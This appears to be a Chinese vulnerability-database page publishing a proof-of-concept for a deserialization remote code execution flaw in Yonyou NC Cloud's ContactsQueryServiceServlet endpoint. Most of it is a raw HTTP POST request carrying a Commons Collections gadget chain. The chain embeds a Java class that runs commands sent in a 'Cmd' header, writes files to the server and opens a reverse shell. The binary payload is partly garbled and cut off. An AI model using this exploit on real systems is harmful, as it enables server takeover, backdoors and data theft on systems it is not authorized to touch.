用友 NC ContactsQueryServiceServlet 接口远程代码执行漏洞

2023-11-15 用友NC PoC Public

Description

用友 NC Cloud 是一种商业级的企业资源规划云平台,为企业提供全面的管理解决方案,包括财务管理、采购管理、销售管理、人力资源管理等功能,实现企业的数字化转型和业务流程优化。用友 NC Cloud 存在反序列化代码执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。

PoC

POST /servlet/~uapim/nc.bs.pub.im.ContactsQueryServiceServlet HTTP/1.1
Host: 
Accept-Encoding: gzip
Cmd: echo Fdf5B393f2Ff104
Connection: keep-alive
Content-Length: 8407
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

��srjava.util.HashSet�D�����4xpw?@sr4org.apache.commons.collections.keyvalue.TiedMapEntry��қ9��LkeytLjava/lang/Object;LmaptLjava/util/Map;xptfoosr*org.apache.commons.collections.map.LazyMapn唂�y�Lfactoryt,Lorg/apache/commons/collections/Transformer;xpsr:org.apache.commons.collections.functors.ChainedTransformer0Ǘ�(z�[
iTransformerst-[Lorg/apache/commons/collections/Transformer;xpur-[Lorg.apache.commons.collections.Transformer;�V*��4�xpsr;org.apache.commons.collections.functors.ConstantTransformerXv�A��L	iConstantq~xpvr*org.mozilla.javascript.DefiningClassLoaderxpsr:org.apache.commons.collections.functors.InvokerTransformer���k{|�8[iArgst[Ljava/lang/Object;LiMethodNametLjava/lang/String;[iParamTypest[Ljava/lang/Class;xpur[Ljava.lang.Object;��X�s)lxpur[Ljava.lang.Class;�׮��Z�xptgetDeclaredConstructoruq~vq~sq~uq~uq~tnewInstanceuq~vq~sq~uq~tA4ur[B���T�xp�����1�
�
C�
C�
��
�
��
���
C��
!�������
������������
��
�����
��
!��	��
���
��
���
�����
��
C�
���
!��
!��
!�
���
!��	��
��	���
C�
C����
���
���
L��
N�
��
N�
N
N
/
L
!

!	

]�
]

]



h
h
h�
h

 
!"
t#
t
$
t$
t%
&'
&(
)*
)2
C+
,
t-
/./0
�1
�23456�78BASE64_CHARSLjava/lang/String;
ConstantValue9ipportLjava/lang/Integer;<init>()VCodeLineNumberTable
Exceptions	loadClass%(Ljava/lang/String;)Ljava/lang/Class;	Signature((Ljava/lang/String;)Ljava/lang/Class<*>;proxy&(Ljava/lang/String;)Ljava/lang/String;write8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
clearParamexecreverse'(Ljava/lang/String;I)Ljava/lang/String;rundecode(Ljava/lang/String;)[B
SourceFileA4.java��:;<=>?threads@ABCDEF[Ljava/lang/Thread;GHIJhttptargetjava/lang/Runnablethis$0handlerjava/lang/NoSuchFieldExceptionK?global
processorsjava/util/ListLMNOPQRreqgetResponsejava/lang/ClassSTjava/lang/ObjectUVW	getHeaderjava/lang/Stringcmd��XY	setStatusZ[\]^$org.apache.tomcat.util.buf.ByteChunk��_RsetBytes[B`TdoWritejava/lang/Exceptionjava.nio.ByteBufferwrapa� java/lang/ClassNotFoundExceptionbcdefcommand not nullgH#####hi��:jk"command reverse host format error!��lm��java/lang/Thread�no�$$$$$file format error!��@@@@@��java/io/File�pjava/io/FileOutputStream�q���rs�t�uHvHwxos.nameyz�{Hwinping-njava/lang/StringBuilder|} -n 4/c -t 4sh-c~���java/util/Scanner�����\a��QH����/bin/shcmd.exe��java/net/Socket�����P������������reverse execute error, msg ->�H!reverse execute ok!����sun.misc.BASE64DecoderdecodeBufferjava.util.Base64
getDecoder&org.apache.commons.codec.binary.Base64A4@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
currentThread()Ljava/lang/Thread;getThreadGroup()Ljava/lang/ThreadGroup;getClass()Ljava/lang/Class;getDeclaredField-(Ljava/lang/String;)Ljava/lang/reflect/Field;java/lang/reflect/Field
setAccessible(Z)Vget&(Ljava/lang/Object;)Ljava/lang/Object;getName()Ljava/lang/String;contains(Ljava/lang/CharSequence;)Z
getSuperclassiterator()Ljava/util/Iterator;java/util/IteratorhasNext()Znext()Ljava/lang/Object;	getMethod@(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;java/lang/reflect/Methodinvoke9(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;getBytes()[Bjava/lang/IntegerTYPELjava/lang/Class;valueOf(I)Ljava/lang/Integer;newInstancegetDeclaredMethodforNamegetContextClassLoader()Ljava/lang/ClassLoader;java/lang/ClassLoaderequals(Ljava/lang/Object;)Ztrim
startsWith(Ljava/lang/String;)Zsplit'(Ljava/lang/String;)[Ljava/lang/String;parseInt(Ljava/lang/String;)I(Ljava/lang/Runnable;)Vstart(Ljava/l...[已截断]

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

Related Vulnerabilities